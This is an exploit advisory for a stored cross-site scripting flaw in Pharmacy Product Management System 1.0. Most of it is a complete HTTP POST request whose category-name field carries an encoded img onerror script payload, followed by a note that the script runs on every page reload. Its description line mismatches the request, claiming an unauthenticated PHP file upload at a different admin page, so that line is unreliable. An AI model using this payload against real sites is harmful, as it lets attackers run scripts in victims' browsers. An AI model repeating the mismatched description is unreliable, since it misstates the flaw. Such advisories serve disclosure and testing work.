📄 Pharmacy Product Management System 1.0 Cross Site Scripting

# Exploit Title: Pharmacy Product Management System - Persistent XSS
    # Date: 25.08.2025
    # Exploit Author: Ömer Ahmet Yılmaz
    # Vendor Homepage: https://www.sourcecodester.com/php/17883/web-based-product-alert-system.html
    # Software Link: https://www.sourcecodester.com/download-code?nid=17883&title=Web-based+Pharmacy+Product+Management+System+using+PHP+and+MySQL+Database
    # Version: 1.0
    # Tested on: Linux
    
    ## Unauthenticated users can access /Admin/add-admin.php address and they can upload malicious php file by changing Content-Type to image/jpeg instead of profile picture image without any authentication. 
    
    POST /product_expiry/add-category.php HTTP/1.1
    Host: myapp.local:8080
    Content-Length: 73
    Cache-Control: max-age=0
    Origin: http://myapp.local:8080
    Content-Type: application/x-www-form-urlencoded
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
    Sec-GPC: 1
    Accept-Language: en-US,en;q=0.5
    Referer: http://myapp.local:8080/product_expiry/add-category.php
    Accept-Encoding: gzip, deflate, br
    Cookie: PHPSESSID=3dj1ghq482uh0diebcjt4d1l3q
    Connection: keep-alive
    
    txtcategory_name=%22%3E%3Cimg+src%3Dx+onerror%3Dprompt%281%29%3E&btnsave=
    
    # After sending a POST request with a malicious payload, the code is stored in the database and will be triggered every time the affected page is reloaded, resulting in a persistent (stored) XSS vulnerability.